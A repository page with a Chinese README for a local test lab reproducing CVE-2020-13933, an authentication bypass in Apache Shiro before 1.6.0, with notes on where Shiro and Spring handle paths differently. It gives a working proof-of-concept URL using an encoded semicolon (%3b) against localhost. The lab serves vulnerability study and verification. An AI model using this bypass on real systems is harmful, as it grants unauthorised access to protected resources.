EXP-Docs/CVE-2020-13933
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
20 Commits 1 Branch 0 Tags
master
Go to file
Clone
Open with VS Code Open with VSCodium Open with Intellij IDEA
Download ZIP Download TAR.GZ Download BUNDLE
EXP 6438c9d9e5 Update FUNDING.yml
2023-04-09 10:44:19 +08:00
.github
Update FUNDING.yml
2023-04-09 10:44:19 +08:00
imgs
更新靶场说明
2020-09-11 08:22:58 +08:00
src
Update NameController.java
2020-09-11 08:30:11 +08:00
.gitignore
to idea
2023-03-24 00:26:05 +08:00
pom.xml
Update pom.xml
2020-09-12 01:14:10 +08:00
README.md
更新靶场说明
2020-09-11 08:27:26 +08:00

README.md

CVE-2020-13933 靶场

shiro < 1.6.0 身份认证绕过漏洞

PoC

http://127.0.0.1:8080/res/%3bpoc

靶场环境

代码说明

  • ShiroConfig.java
      权限配置, 当请求 /res/* 资源时, 302 跳转到登陆页面进行身份认证
  • NameController.java
      · /res/{name} 请求名为 name 的的资源(触发身份认证)
      · /res/ 不请求任何资源(不触发身份认证)

靶场验证

不在请求路由中指定资源名称时,不触发身份验证,也无资源返回: http://127.0.0.1:8080/res/

在请求路由中指定资源名称时302 跳转到身份验证页面: http://127.0.0.1:8080/res/poc

构造特定 PoC 请求指定资源时,不触发身份验证,并返回资源: http://127.0.0.1:8080/res/%3bpoc %3b; 的 URL 编码)

漏洞 DEBUG 位置

shiro-web-1.5.3.jar

// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}

spring-web-5.2.5.RELEASE.jar

// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
Description
No description provided
Readme 701 KiB
Languages
Java 100%